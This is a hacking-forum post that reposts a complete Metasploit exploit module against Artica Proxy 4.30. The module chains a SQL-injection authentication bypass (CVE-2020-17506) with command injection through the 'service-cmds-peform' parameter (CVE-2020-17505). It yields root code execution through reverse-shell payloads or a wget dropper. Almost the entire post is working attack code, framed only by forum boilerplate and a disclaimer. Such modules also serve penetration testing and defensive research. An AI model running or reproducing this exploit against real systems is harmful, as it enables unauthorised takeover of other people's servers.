Jump to content
CNHCAKTEAM

Artica代理4.30.000000身份验证绕过/命令注入漏洞

Recommended Posts

  • Administrator
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection',
        'Description' => %q{
          This module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass
          discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials.
          The application runs in virtual appliance, successful exploitation of this vulnerability yields remote code execution as root on the
          remote system.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Max0x4141', # discovery
            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # msf module
          ],
        'References' =>
          [
            ['CVE', '2020-17505'], # RCE
            ['CVE', '2020-17506'], # Auth bypass
            ['EDB', '48744'],
            ['PACKETSTORM', '158868'],
            ['URL', 'https://blog.max0x4141.com/post/artica_proxy/']
          ],
        'DefaultOptions' =>
          {
            'SSL' => true,
            'RPort' => 9000
          },
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix Command',
            'Platform' => 'unix',
            'Arch' => ARCH_CMD,
            'Type' => :unix_command,
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_perl'
            }
          ],
          [
            'Linux Dropper',
            'Platform' => 'linux',
            'Arch' => [ARCH_X86, ARCH_X64],
            'Type' => :linux_dropper,
            'DefaultOptions' => {
              'CMDSTAGER::FLAVOR' => 'wget',
              'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2020-08-09',
        'DefaultTarget' => 1,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Artica Proxy', '/']),
        OptString.new('PHPSESSID', [false, 'The cookie obtained after successful authentication, if present'])
      ]
    )
 
    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
    import_target_defaults
  end
 
  def check
    if datastore['PHPSESSID']
      @phpsessid = datastore['PHPSESSID']
    else
      check_result = auth_bypass
      return check_result unless check_result == CheckCode::Vulnerable
 
      @phpsessid = check_result.reason
    end
    rand_string = Rex::Text.rand_text_alphanumeric(4..16)
    if execute_command("echo #{Rex::Text.encode_base64(rand_string)}|base64 -d").include?(rand_string)
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end
 
  def execute_command(cmd, _opts = {})
    print_status 'Attempting to gain RCE via CVE-2020-17505'
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'cyrus.index.php'),
      'vars_get' => {
        'service-cmds-peform' => "||#{Rex::Text.uri_encode(cmd, 'hex-all')}||"
      },
      'cookie' => "PHPSESSID=#{@phpsessid}; AsWebStatisticsCooKie=1; shellinaboxCooKie=1"
    })
    res ? res.body : ''
  end
 
  def auth_bypass
    serialized_object = 'a:2:{s:3:"uid";s:4:"-100";s:22:"ACTIVE_DIRECTORY_INDEX";s:1:"1";}'
    apikey = "' UNION select 1,'#{Rex::Text.encode_base64(serialized_object)}';"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'fw.login.php'),
      'vars_get' => {
        'apikey' => apikey
      }
    })
    return Exploit::CheckCode::Unknown("Unable to connect to #{target_uri.path}") unless res
    return Exploit::CheckCode::Safe('Authentication failed') unless res && [200, 301, 302].include?(res.code)
 
    Exploit::CheckCode::Vulnerable(res.get_cookies[/PHPSESSID=(.+?);/, 1])
  end
 
  def exploit
    if datastore['PHPSESSID']
      @phpsessid = datastore['PHPSESSID']
    else
      print_status 'Attempting to bypass authentication via CVE-2020-17506 (SQL injection)'
      bypass_result = auth_bypass
      case bypass_result
      when CheckCode::Safe then fail_with(Failure::NoAccess, bypass_result.reason)
      when CheckCode::Unknown then fail_with(Failure::Unknown, bypass_result.reason)
      else @phpsessid = bypass_result.reason
      end
    end
    print_good "Session cookie : #{@phpsessid}"
    case target['Type']
    when :unix_command then execute_command(payload.encoded)
    when :linux_dropper then execute_cmdstager
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
  end
end

 

Link to post
Share on other sites

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines